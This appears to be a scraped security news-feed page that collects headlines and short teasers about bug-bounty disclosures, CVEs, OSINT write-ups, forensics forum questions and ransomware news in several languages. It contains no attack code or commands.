    Turning Open Reporting Into Detections
    I saw this tweet from Ankit recently, and as soon as I read through it, I thought I was watching "The Matrix" again. Instead of seeing the "blonde, brunette, redhead" that Cypher saw, I was seeing actionable detection opportunities and pivot points. How you choose to use them...detections in EDR telemetry or from a SIEM, threat hunts, or specifically flagging/alerting on entries in DFIR parsing...is up to you, but there are some interesting...and again, actionable...opportunities, nonetheless. From the tweet itself... %Draft% is environment variable leading to PowerShell Environment variables are good...because someone has to set that variable using...wait for it...w  a  i  t   f  o  r    i  t...the 'set' command. This means that if the variable is set via the command line, the process …
  • Open

    [doc.rt.informaticacloud.com] Reflected XSS via Stack Strace
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232320
    [doc.rt.informaticacloud.com] Arbitrary File Reading via Double URL Encode
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232371
    reflected XSS on panther.com
    Panther Labs disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1601140 - Bounty: $250
    Rack CVE-2022-30122: Denial of Service Vulnerability in Rack Multipart Parsing
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1627159 - Bounty: $2400
  • Open

    Siber Güvenlikte Kariyer
    Siber Güvenlikte Kariyer Continue reading on Bilişim Hareketi »
  • Open

    Jonathan's fun stuff
    http://users.ninja.org.uk/~jonathan/funstuff/ submitted by /u/RainyAbrar [link] [comments]
  • Open

    An informal review of CTF abuse
    Recently chatting with a friend I realized I can recall a lot of interesting stories of how players tried to abuse a given CTF tournament to gain an extra edge over the competition. So in this informal blog post I'll try to list what I remember for both the purpose of documenting this so others can learn from history, and also due to its fun factor (or rather: fun factor after a couple of years passed and folks stopped being annoyed or down right furious at the perpetrators). Note that some of what I'll log here are just stories I've heard. Other things I might have witnessed on my own. In either case I won't be posting any details of who / when / at what CTF – that's not the purpose of this post. Rather than that I'll try to distill and present the general concept. Update: In case you…

  • Open

    IDOR in report download functionality on ads.tiktok.com
    TikTok disclosed a bug submitted by f_m: https://hackerone.com/reports/1559739 - Bounty: $500
    CVE-2022-32214 - HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630669 - Bounty: $1800
    CVE-2022-32213 - HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630668 - Bounty: $1800
    CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630667 - Bounty: $1800
  • Open

    Vex: Permanently Silence False Positives with Vulnerability EXchange
    Article URL: https://www.lunasec.io/docs/blog/vex-silence-false-positives/ Comments URL: https://news.ycombinator.com/item?id=32198211 Points: 1 # Comments: 0
    Major Security Vulnerability on PrestaShop Websites
    Article URL: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/ Comments URL: https://news.ycombinator.com/item?id=32196961 Points: 2 # Comments: 1
  • Open

    Sector035’s 2020 OSINT Quiz
    I’m an OSINT newbie, but have been looking for challenges to practice a few of the skills I‘ve developed, and I came across this 18… Continue reading on Medium »
    OSINT: Vulnerable Webcam using SHODAN
    Shodan is one of the most popular and dangerous search engine which gives you all information from the banners and pulls from web-enabled… Continue reading on Medium »
    TryHackMe | Searchlight — IMINT Writeup
    TryHackMe’s Searchlight - IMINT room is an easy image-related OSINT room. We are tasked with analyzing images and finding information… Continue reading on Medium »
    War in Ukraine / July 21
    Day 149: The situation at the front has been stabilized. Helped by HIMARS Continue reading on Medium »
    #SwissArms: how to identify Sig Sauer assault rifles with Saudi forces in Yemen’s war
    Preamble Continue reading on Medium »
    Mengungkap Siapa Dibalik SPM55
    SPM55 adalah threat actor dari Indonesia yang menjual phishing atau scampage. Sebenarnya sudah pernah dibahas di thread Twitter tanggal 31… Continue reading on Medium »
  • Open

    New to DFIR. Unable to mount drives in Paladin.
    submitted by /u/Tristanrodz [link] [comments]
    New forensic file format
    Hello all, a while ago I started to design and build a PoC regarding an increase in read/write performance with a new forensic file format. The PoC resulted in the specification of a first than a second improved version of a new file format for forensic images "zff" - as an alternative to the meanwhile quite outdated EWF, AFF, ... formats. Zff has the potential (depending on the input data) to provide significant speed increase (see benchmarks at https://github.com/ph0llux/zff). Furthermore, zff offers a massively expanded feature set: physical and logical dumps multiple dumps (both logical and physical) in one container keeping related evidence together extension of existing containers (with both logical and physical dumps) hashing algorithms used for integrity purposes considered most secure, fast and modern at the moment optional data encryption (even partially, if desired) (for security purposes). optional digital signature of stored data (for authenticity purposes; using a public-private key method). great flexibility when adding descriptions to cases and much more The documentation of the file format can be found at https://zff.dev (website is work in progress). I've written also a reference implementation to create, analyze and handle files in zff format. The library is written in Rust and can be found at https://github.com/ph0llux/zff. You can try it out yourself using the tools zffacquire, zffmount and zffanalyze (see the github link). We've tested the tools ourselves, but if you find any errors in the reference library, please open a github issue. submitted by /u/ph0llux [link] [comments]
    Windows honeypots for forensic analysis
    Hi All, Has anyone here used Windows virtual machines or devices as a honeypot(s) to capture malicious activity and artifacts? I'm interested in gathering logs, pcaps, memory and images much like the content published by the dfir report. I'm curious to hear what risks and challenges were faced, as well as what lessons were learnt. Cheers submitted by /u/netw0rknovice [link] [comments]
    Using cloud storage as a forensic collection platform
    Hi CF! I'm engaging with a client who wishes to obtain a number of documents from ~50 different sources. They are cost conscious, and are considering whether they can setup a platform and enable the sources to put files there - including relevant file hashes etc. These sources would be the complaintant, in this case - and the client would be the lawyer. I'm inclined to go with good old fashioned physical collection using write-blockers et al - but always conscious I might be missing something. Any thoughts on wise people? submitted by /u/smartypantz_ [link] [comments]
  • Open

    Interesting blogs/books about cyber security in large scale and complex infrastructures
    I work for a company that is particularly disorganized, due to a long series of mergers. The whole infrastructure is fragmented, rendering even simple security operations very hard and long to complete. Working in this environment is frustrating, but the worst part is that, with my experience, I really don't have any clue on how to handle such level of complexity. I would like to read some inspiring article that explains how big infrastructures - like in FAANG-like companies - are secured against cyber attacks. Do you know any interesting blog for this purpose? Or books? submitted by /u/subseven93 [link] [comments]
    Need recommendation for studying ISO 27005
    Could you please recommend best studying material for ISO 27005? submitted by /u/OmegaMan-PT [link] [comments]
    Practical uses of MITRE ATT&CK MATRIX
    What are the practical applications of the matrix? The only one I know of and have seen is to use it to identify whether within one's perimeter one can identify and block any TTPs, but is that the only practical application? What are some other uses? Thanks submitted by /u/woodpmirror [link] [comments]
  • Open

    Defeating Javascript Obfuscation
    submitted by /u/baryoing [link] [comments]
    Confuser - New Dependency Confusion Detection Tool
    submitted by /u/nibblesec [link] [comments]
    A repository of Windows persistence mechanisms
    submitted by /u/CyberMasterV [link] [comments]
    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    PART 1: How I Met Your Beacon - Overview
    submitted by /u/gid0rah [link] [comments]
  • Open

    I mean, IDOR is NOT only about others ID
    Hi folks! In this write-up, I’m going to talk about the vulnerability I found to broaden your perspective on IDORs. Continue reading on InfoSec Write-ups »
    How I was able to Take over a support chat using leaked Keys
    Hello Everyone.  First, let me introduce myself. I’m Pliskin ( from MGS x) ), I’m an associate systems engineer, CTF player and I do some… Continue reading on Medium »
    Welcome to Hats, Idle Finance.
    Another great team joins the Hats Finance Bounty Program! Welcome Idle Finance, excited to have you onboard. Continue reading on Medium »
    Slavi Announced Bug Bounty Program
    Hello everyone! We are excited to run a global bounty campaign to test our brand-new Slavi Wallet and bring the revolutionary blockchain… Continue reading on Medium »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Continue reading on InfoSec Write-ups »
    Balancer DoS Bugfix Review
    On May 14th, ChainSecurity employee @k_besic reported a vulnerability classified as “Medium” in Balancer protocol. The vulnerability… Continue reading on Immunefi »
    Bug Bounty
    In 2021 hackers made off with $14 Billion in cryptocurrency, double the 2020 figures of $7 billion. 2022 will be no different. DeFi… Continue reading on Medium »
  • Open

    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    PART 1: How I Met Your Beacon - Overview - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: Open API and GraphQL Fuzzing via GitHub Actions
    Schemathesis is a specification-centric API fuzzing tool for Open API and GraphQL-based applications. I've been building Schemathesis GitHub app for a while and now it is ready to use. You run it as a part of your workflow, then it comes to PRs and adds little reports about API fuzzing results. Folks, I'd appreciate your feedback about the tool or its GitHub integration :) Comments URL: https://news.ycombinator.com/item?id=32193967 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-07-22 Review
    CVE-2019-0808 by SecIN社区 如何通过GPS追踪器关闭汽车引擎 by ourren 可视化全链路日志追踪 by ourren 代码表征预训练语言模型学习指南:原理、分析和代码 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-22 Review
    CVE-2019-0808 by SecIN社区 如何通过GPS追踪器关闭汽车引擎 by ourren 可视化全链路日志追踪 by ourren 代码表征预训练语言模型学习指南:原理、分析和代码 by ourren 更多最新文章,请访问SecWiki
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Continue reading on InfoSec Write-ups »
    MSA #1 How to Generate & Installing Burpsuite Certificate to Nox Emulator
    What needs to be prepared : Continue reading on Medium »
    A Lab for Practicing Azure Service Principal Abuse
    Introduction Continue reading on InfoSec Write-ups »
    Siber Güvenlikte Mavi Takım Üyesi Olmak
    Siber Güvenlikte Mavi Takım Üyesi Olmak Continue reading on Bilişim Hareketi »
  • Open

    《关于开展网络安全服务认证工作的实施意见(征求意见稿)》发布
    认证规则和认证标志由市场监管总局征求中央网信办、公安部意见后另行制定发布。
    FreeBuf早报 | 威胁者使用GoMet攻击乌克兰;Conti入侵并加密哥斯达黎加政府
    Conti入侵并加密哥斯达黎加政府。
    FreeBuf周报 | 万代南梦宫证实遭黑客入侵;阿尔巴尼亚政府遭受“大规模网络攻击”
    各位 FreeBufer 周末好~以下是本周的「FreeBuf 周报」!
    企业应缩小攻防差距 | 《2022企业攻击面管理》报告解读
    Hackerone发布了《2022年企业攻击面管理》报告。
    系统日志的安全管理与审计 | FreeBuf甲方群话题讨论
    系统日志在攻击中被清掉了该怎么恢复?日志管理这一块平时应该怎么做?对其审计做起来是不是比较麻烦?
    Atlassian修复了一个关键的Confluence漏洞
    Atlassian发布了安全更新。
    Microsoft Teams 故障导致 Microsoft 365 服务中断
    近日的一个Microsoft Teams小故障,却使得多个与Teams整合的Microsoft 365服务瘫痪。
    Operation(호랑이머리깃발)ShadowTiger:盘踞在佛岩山上的过林之虎
    2019年奇安信威胁情报中心发布《阻击“幻影”行动:奇安信斩断东北亚APT组织“虎木槿”伸向国内重要机构的魔爪》。
    谷歌把全球最大的计算机协会 (ACM)给封了
    Google 搜索和云端硬盘错误地将全球最大的计算机协会 (ACM) 研究论文和网站的链接标记为恶意软件。
    SQL 注入之 Getshell 实战学习
    SQL 注入之 Getshell 的实战学习,一起来上手试一试吧 !
  • Open

    CAD files for a free energy, perpetual motion machine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Mirrors
    https://mirrors.dtops.cc submitted by /u/ilikemacsalot [link] [comments]
    all the insurance application forms you could ever want
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    CVE Trends – Crowdsourced CVE Intel
    Article URL: https://cvetrends.com/ Comments URL: https://news.ycombinator.com/item?id=32187798 Points: 2 # Comments: 0

  • Open

    Sh*Load exploits: SHA Hardware Offload w/o Error Checking
    submitted by /u/Unique-Enthusiasm-54 [link] [comments]
    Gitlab Project Import RCE Analysis (CVE-2022-2185)
    submitted by /u/CyberMasterV [link] [comments]
    The Return of Candiru: Zero-days in the Middle East
    submitted by /u/stashing_the_smack [link] [comments]
    GitHub - TheOfficialFloW/bd-jb: The first bd-j hack.
    submitted by /u/jeandrew [link] [comments]
    Django web applications with enabled Debug Mode, DB accounts information and API Keys of more than 3,100 applications were exposed on internet.
    submitted by /u/zwrinerlucas [link] [comments]
  • Open

    Would like to learn about malware and how it is implemented
    I'm just about completely new to hacking/cybersecurity- related affairs and would like to learn about malware, mainly Trojan horses and specifically those that plant cryptocurrency miners or perhaps ransomware. How do these work, where can they be found, how are they implemented and is it legal to possess them? If possible, please explain in simple terms. P.S.: I feel like I should add that this is just for fun and to satisfy my curiosity, not for malicious or criminal reasons Thank you for your help! submitted by /u/Antique__throwaway [link] [comments]
    Is /Browser a legitimate named pipe, and if so, what does it do?
    I see SMB named pipes called “Browser” in traffic, but I can’t find any documentation on it. There’s a lot of Metasploitable and Confickr related articles about it, but nothing I can find with legitimate uses. \Browser* submitted by /u/Free-Roaming-Orange [link] [comments]
    System information in the URL?
    SIEM tool flagged warning for the website and the URL was like this. The retracted part looked like a hash. Is there a legitimate use case where such data is passed in the URL? "http://randomwebsite.com/update?os=win&arch=x86&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=103.0.5060.114&lang=hu&acceptformat=crx3&x=%3D1.0.5690.34919%26installsource%3Dnotfromwebstore%26installedby%3Dinternal%26uc" submitted by /u/sec_admin [link] [comments]
  • Open

    Unrecognized file system on FTK imager
    Hoping to get some help here as I am new to computer forensics. I’m trying to analyze a .raw memory capture that is 5 gb on ftk but it is showing “unrecognized file system” when trying to view the contents. submitted by /u/1rangusN1dangus [link] [comments]
  • Open

    fix(cmd-socketio-server): mitigate cross site scripting attack #2068
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1638984 - Bounty: $100
  • Open

    What is a red team?
    The red team refers to highly-expert security professionals who can break into defenses and attack systems. Red teams are independent… Continue reading on Medium »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching on how to perform phishing where the target company uses Google Suite instead… Continue reading on System Weakness »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching on how to perform phishing where the target company uses Google Suite instead… Continue reading on Medium »
  • Open

    Ultimate Tips And Tricks To Find More Cross-Site Scripting Vulnerabilities
    @bxmbn Continue reading on Medium »
    Reflected Cross Site Scripting (AkamaiGhost) Bypass
    Disclaimer Continue reading on Medium »
    How I Test For Web Cache Vulnerabilities + Tips And Tricks
    @bxmbn Continue reading on Medium »
    Installing Kali Linux as Portable Live USB for Pentesting.
    Hello Amazing People, Continue reading on Medium »
    Android App Pentest #1 Setup Certificate Burpsuite ke Emulator Android
    Burpsuite adalah tool yang sangat sering di gunakan untuk melakukan Penetration Test / Bug bounty. Burpsuite digunakan sebagai penengah… Continue reading on Medium »
    HackerOne CTF: Postbook
    I recently published an article on a CTF writeup, an introduction to the HackerOne CTF. You can find that article here. Today I am… Continue reading on Medium »
  • Open

    Reflected Cross Site Scripting (AkamaiGhost) Bypass
    Disclaimer Continue reading on Medium »
  • Open

    War in Ukraine / July 20
    Day 148: The logistical “nightmare” of supplying the Ukrainian army Continue reading on Medium »
  • Open

    CVE-2022-23131_Zabbix登录绕过漏洞复现
    CVE-2022-23131漏洞复现
    CCSIP 2022中国网络安全产业全景图(第四版)正式发布 | FreeBuf咨询
    2022年7月21日,国内安全行业门户FreeBuf旗下FreeBuf咨询正式发布《CCSIP 2022中国网络安全产业全景图》(第四版)。
    FreeBuf早报 | 微软冻结安全部门招聘计划;二季度勒索软件受害者环比下降34%
    微软正在取消许多空缺职位招聘,包括其 Azure云业务和安全软件部门。微软确认,近期内招聘冻结将继续。
    物联网终端安全入门与实践之玩转物联网固件(中)
    本篇将系统性介绍终端设备固件仿真的概念、技术、工具和框架,以及手动固件仿真的过程和技巧。
    邮件钓鱼演练指南
    无论是在攻防对抗中,还是面对APT威胁中,企业员⼯安全意识成为影响企业安全隐患的重灾区。
    多款Play Store应用程序分发恶意软件
    The Hacker News 网站披露,Google 已从官方 Play 商店中下架了部分欺诈性应用程序。
    卡巴斯基发出警告,勒索软件Luna来袭
    Luna可加密运行多个操作系统的设备,包括 Windows、Linux 和 ESXi 等主流操作系统。
    国家网信办出手,滴滴被罚80.26亿元
    国家互联网信息办公室依法对滴滴全球股份有限公司处人民币80.26亿元罚款。
    思科修复了允许攻击者以root身份执行命令的BUG
    思科解决了Cisco Nexus Dashboard数据中心管理解决方案中的严重漏洞。
    Gartner安全运营Hype Cycle发布,登顶的XDR未来在何方?
    此次XDR登顶并未让众人对“XDR将成为未来安全运营的关键技术”的观点趋于一致,反而进一步激化了彼此之间的分歧。
    Neopets遭遇数据泄露,源代码与数据库被盗
    虚拟宠物网站Neopets遭遇数据泄露,导致源代码以及包含6900多万会员个人信息的数据库被盗。
    WIKI知识大陆@你开启共建奇旅,「接受」or「同意」?
    「WIKI知识大陆」共建列车已到站,静待你,检票上车!
    诈骗者正利用虚假的YouTube谷歌搜索结果行骗
    网络安全公司 Malwarebytes批露了利用虚假Youtube谷歌广告搜索结果进行的诈骗行为。
  • Open

    SecWiki News 2022-07-21 Review
    浅析JNDI注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-21 Review
    浅析JNDI注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Tag Blending Obfuscation In Property-Based Payloads
    Property-based payloads are payloads based on some particular properties of the document object and the elements. From the document object we already know the location-based payloads and from the elements we have the properties  “innerHTML” and “outerHTML”. Those 3 are very useful to evade a filter or WAF when we get to the point where … Continue reading Tag Blending Obfuscation In Property-Based Payloads The post Tag Blending Obfuscation In Property-Based Payloads appeared first on Brute XSS.
  • Open

    Keep your finger on the pulse of the most critical software vulnerabilities in the market
    Hackers can deploy exploits in a week or less. That reality keeps many up at night—and given it’s nearly impossible to keep up with all updates for all software on your own, it’s critical to prioritize which applications need attention first. Understanding vulnerabilities A vulnerability is an error in software that can be exploited with a security impact and gain. Secunia Research validates, verifies and tests vulnerability information to author security advisories. These advisories provide valuable details by following consistent and standard processes that have been refined over the years. Whenever a new vulnerability is reported and verified a Secunia…
  • Open

    Burp Suite roadmap update: July 2022
    With six (and a bit) months of 2022 already gone, it's time to bring you an update on the latest happenings down at Burp Towers. Find out what we've been up to, and where we're going between now and 2
  • Open

    Burp Suite roadmap update: July 2022
    With six (and a bit) months of 2022 already gone, it's time to bring you an update on the latest happenings down at Burp Towers. Find out what we've been up to, and where we're going between now and 2
  • Open

    Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
    The 2022 Unit 42 Network Threat Trends Research Report includes an analysis of the CVEs most commonly exploited in 2021 and predictions for which CVEs attackers will likely focus on in the year to come. The post Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report appeared first on Unit 42.
  • Open

    Valve stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    lots and lots of old flash games
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    HTB-Business CTF
    No content preview
  • Open

    HTB-Business CTF
    No content preview
  • Open

    HTB-Business CTF
    No content preview
  • Open

    云沙箱流量识别技术剖析
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 大家好,我是风起,本次带来的是基于流量的沙箱识别技术。相信大家都知道,沙箱识别是老生常谈的话题了,目前大部分的识别方案都是基于样本侧去完成的,例如常规方式:硬件检查(CPU核心数、输入输出设备、内存)、鼠标移动检查、进程名、系统服务、开机时长等,都不能...
  • Open

    云沙箱流量识别技术剖析
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 大家好,我是风起,本次带来的是基于流量的沙箱识别技术。相信大家都知道,沙箱识别是老生常谈的话题了,目前大部分的识别方案都是基于样本侧去完成的,例如常规方式:硬件检查(CPU核心数、输入输出设备、内存)、鼠标移动检查、进程名、系统服务、开机时长等,都不能...

  • Open

    DOM XSS on ads.tiktok.com
    TikTok disclosed a bug submitted by 0x7: https://hackerone.com/reports/1549451 - Bounty: $2500
    Internal Employee informations Disclosure via TikTok Athena api
    TikTok disclosed a bug submitted by hein_thant: https://hackerone.com/reports/1575560 - Bounty: $1000
    Can access the job name, creator name and can report any draft/under review/rejected job
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1581528 - Bounty: $1000
    LFI via Jolokia at https://...:1293
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1641661
  • Open

    TryHackMe | OhSINT Writeup
    TryHackMe’s OhSINT room writeup, from a single photo to finding a person’s password. Continue reading on Medium »
    MDI Nerede? — Raw Security Sohbetleri 0x04 (OSINT)
    Bu yazıda Raw Security Sohbetleri’nin 4. bölümünde Mehmet Abi’nin konumunu OSINT ile nasıl bulduğumuzu anlatmaya çalışacağım. Continue reading on Medium »
    War in Ukraine / July 19
    Day 147: Ukraine promotes the Kherson direction Continue reading on Medium »
  • Open

    Variable PATH
    Explotación de la variable PATH para ganar acceso al sistema obteniendo una shell con maximos privilegios. Continue reading on Medium »
    Windows Desktop (Thick) Client Pentesting — DLL Hijacking
    Welcome white hats! Have you ever done thick client pentesting? Have you ever found DLL hijacking in real engagement? I know that it is… Continue reading on Medium »
  • Open

    ZeroTrust Certifications?
    Any zerotrust related security certifications? Thanks in advance. submitted by /u/DisturbedBeaker [link] [comments]
    Good mid-level Incident Response training?
    Good morning, The vast majority of all alerts generated that I have experience with are simple auto-remediated stuff through Microsoft Defender for Endpoint or just easy Q&A type of stuff (like, large volume of data being deleted...look who it is and what it is, ask a question, resolve the alert, etc). I have realized that "true" IR is an area I feel very unprepared for, so my question to the Reddit community is, what are your recommendations on some beneficial mid-level IR training? By mid-level I mean that I won't be doing incredibly detailed stuff like forensics, but I do want to learn a bit of hands-on procedures/methodology and not have it all just be higher level theory/design. Thanks! submitted by /u/ToLayer7AndBeyond [link] [comments]
  • Open

    【安全通报】Weblogic 七月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 7 月份的安全更新。涉及旗下产品(Weblogic Server、Databa se Server、Java SE、MySQL等)的 349 个漏洞。此次修复的漏洞中包...
  • Open

    【安全通报】Weblogic 七月份更新多个高危漏洞
    近日,Oracle官方 发布了 2022 年 7 月份的安全更新。涉及旗下产品(Weblogic Server、Databa se Server、Java SE、MySQL等)的 349 个漏洞。此次修复的漏洞中包...
  • Open

    Multiple Vulnerabilities in Atlassian Products
    submitted by /u/sullivanmatt [link] [comments]
    [CVE-2022-34918] A crack in the Linux firewall
    submitted by /u/gquere [link] [comments]
    DNS-over-HTTP/3 in Android
    submitted by /u/SeanPesce [link] [comments]
    Cloud is more fun with an SSRF
    submitted by /u/Ancient_Title_1860 [link] [comments]
    Session On Android – An App Wrapped in Signal
    submitted by /u/jeandrew [link] [comments]
  • Open

    From Stack Trace Laravel Leads to Privilege Escalation [Admin]
    Hi!, In this Article I will only tell a little about the findings that I think are interesting to be used as stories on my medium.com xD Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks & Cara Mencegahnya / Patched #Episode_SSRF1
    Serangan Server-Side Request Forgery (SSRF) memungkinkan penyerang membuat permintaan ke domain apa pun melalui server yang rentan… Continue reading on Medium »
    Initial Setup Genymotion & Burpsuite for Android Mobile App Pentest(Bahasa)
    Pada kesempatan kali ini, saya menulis artikel mengenai instalasi genymotion dan burpsuite yang akan digunakan untuk melakukan penetrasi… Continue reading on Medium »
    Instalasi Genymotion dan pemasangan Burpsuite certificate pada emulator Genymotion
    Halo teman-teman, selamat datang di post medium pertama saya. Pada post ini saya akan membagikan tutorial bagaimana cara instalasi… Continue reading on Medium »
    Genymotion Device Installation and Burpsuite Certificate Installation in Genymotion Emulator…
    First, open Genymotion App Continue reading on Medium »
    Maximizing the potential of the “Subfinder”
    Hi guys, in this post I will be sharing about how to maximize the potential of subfinder. So, what is subfinder? and how to use it… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-20 Review
    关于安全情报能力和应用的一些思考 by ourren 对全网上一些JSONP蜜罐探索与识别 by ourren 一次曲折的代码审计+渗透+绕过WAF+提权实战 by ourren Web3发展前瞻研究报告 by ourren 样本相似分析新尝试:通过音频实现 by Avenger 《物联网终端安全入门与实践之了解物联网终端》下 by ourren 物联网终端安全入门与实践之玩转物联网固件(中) by ourren 《物联网终端安全入门与实践之玩转物联网固件》上 by ourren 物联网终端安全入门与实践之了解物联网终端 (上篇) by ourren 关于X信数据库的解密以及取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-20 Review
    关于安全情报能力和应用的一些思考 by ourren 对全网上一些JSONP蜜罐探索与识别 by ourren 一次曲折的代码审计+渗透+绕过WAF+提权实战 by ourren Web3发展前瞻研究报告 by ourren 样本相似分析新尝试:通过音频实现 by Avenger 《物联网终端安全入门与实践之了解物联网终端》下 by ourren 物联网终端安全入门与实践之玩转物联网固件(中) by ourren 《物联网终端安全入门与实践之玩转物联网固件》上 by ourren 物联网终端安全入门与实践之了解物联网终端 (上篇) by ourren 关于X信数据库的解密以及取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    ZAP Alert Filters로 Risk 가지고 놀기
    Alert filters Alert filters는 ZAP에서 발견한 이슈(Alert)들을 쉽게 관리하기 위한 Filter 기능입니다. 지정한 조건에 따라서 Alert의 Risk Level을 조정하거나 나타나지 않게 할 수 있습니다. ZAP을 Proxy로 사용하는 경우 자주 사용되는 기능은 아니지만, DevSecOps 등 DAST 서비스로서 사용하는 경우에는 잘 활용한다면 발견되는 이슈의 정확도를 많이 높일 수 있습니다. Alert filters는 2가지 형태로 존재합니다. Context Alert Filters Global Alert Filters Context Alert Filters Context Alert Filters는 각 Context(Scope)를 대상으로 하는 Alert filters 입니다. 지정한 Context에 설정할 수 있고, 해당 Context에 추가된 Alert 들만 영향을 받습니다. Context > Alert filters Global Alert Filters Global Alert Filters는 ZAP 전체적으로 적용받는 Alert filters입니다. Options > Global Alert Filters Struct of Alert fileter   Type Description Example Scope 고정 값 Global/Context Name   Alert Type 조건 Alert name이 같다면 XSS, SQL Injection URL 조건 URL이 같다면 https://google.com URL is Regex? 조건 URL 매치 시 정규표현식을 사용할지? true/false Parameter 조건 파라미터가 같다면 query Parameter is Regex? 조건 파라미터 매치 시 정규표현식을 사용할지? true/false Attack 조건 공격코드가 같다면 query= Attack is Regex? 조건 공격코드 매치 시 정규표현식을 사용할지? true/false Evidence 조건 탐지결과가 같다면 aaa aaa Evidence is Regex? 조건 탐지결과 매치 시 정규표현식을 사용할지? true/false New Risk Level 결과 새로 정의할 Risk Level False Positive,Low,Medium Enabled 상태 해당 Filter를...
  • Open

    More to find in a previous post.
    http://s28.bitdl.ir/>> Follow your nose and see what you find... http://s28.bitdl.ir/Video/Good stuff in here. http://s28.bitdl.ir/Compresed/More good stuff in here... http://s28.bitdl.ir/Compresed/Lynda/ http://s28.bitdl.ir/Compresed/OREILLY/ http://s28.bitdl.ir/Compresed/Udemy/ submitted by /u/klutz50 [link] [comments]
    geometry, topology and comp-sci papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    How about finding open directories that are nofollow?
    Any good methods on this finding nofollow open directories? submitted by /u/G-Streams [link] [comments]
  • Open

    FreeBuf早报 | 阿尔巴尼亚政府遭受“大规模网络攻击”;BlackBerry 2022威胁报告
    欧盟理事会 (EU)向外界警告称威胁行为者在俄罗斯和乌克兰之间持续冲突的背景下进行的恶意网络活动。
    「斗象攻防演练宝典」之妙手部署“云蜜罐”
    一文看清蜜罐部署的本手、妙手与俗手
    过去10年的10起“分水岭”网络安全事件
    网络安全供应商Trustwave列出了过去10年中,最突出和最值得注意的10个网络安全问题和违规事件。
    知名GPS出现漏洞,可使黑客获得管理权限
